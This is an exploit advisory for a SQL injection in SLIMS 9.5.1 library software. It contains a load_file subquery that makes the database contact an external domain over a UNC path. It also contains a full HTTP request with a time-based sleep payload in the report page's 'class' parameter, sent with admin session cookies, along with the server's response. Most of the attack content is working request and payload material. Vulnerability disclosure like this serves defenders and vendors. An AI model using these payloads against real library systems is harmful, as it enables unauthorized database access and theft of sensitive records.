## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi ## Author: nu11secur1ty ## Date: 12.06.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://slims.web.id/web/news/rilis-9.5.1/ ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1 ## Description: The manual insertion `point 4` appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+' was submitted in the manual insertion `point 4` testing. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can execute a very dangerous `subquery` to view very sensitive information. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa HTTP/1.1 Host: pwnedhost.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1; SenayanMember=schm4nbtgbb5i1tbeonr6cav3u Connection: close ``` [+] Response: ```MySQL HTTP/1.1 200 OK Date: Tue, 06 Dec 2022 13:51:38 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block Content-Length: 4120 Connection: close Content-Type: text/html; charset=UTF-8 Loan Report by Class Report
Loan Recap By Class bbbb'+(select*from(select(sleep(5)))a)+' for year 2002 Print Current PageExport to spreadsheet format Show in chart/plot
ClassificationJanFebMarAprMayJunJulAugSepOctNovDec
bbbb'+(select*from(select(sleep(5)))a)+'00000000000000
bbbb'+(select*from(select(sleep(5)))a)+'00000000000000
bbbb'+(select*from(select(sleep(5)))a)+'10000000000000
bbbb'+(select*from(select(sleep(5)))a)+'20000000000000
bbbb'+(select*from(select(sleep(5)))a)+'30000000000000
bbbb'+(select*from(select(sleep(5)))a)+'40000000000000
bbbb'+(select*from(select(sleep(5)))a)+'50000000000000
bbbb'+(select*from(select(sleep(5)))a)+'60000000000000
bbbb'+(select*from(select(sleep(5)))a)+'70000000000000
bbbb'+(select*from(select(sleep(5)))a)+'80000000000000
bbbb'+(select*from(select(sleep(5)))a)+'90000000000000
``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1) ## Proof and Exploit: [href](https://streamable.com/gthu91) ## Time spent `04:00:00`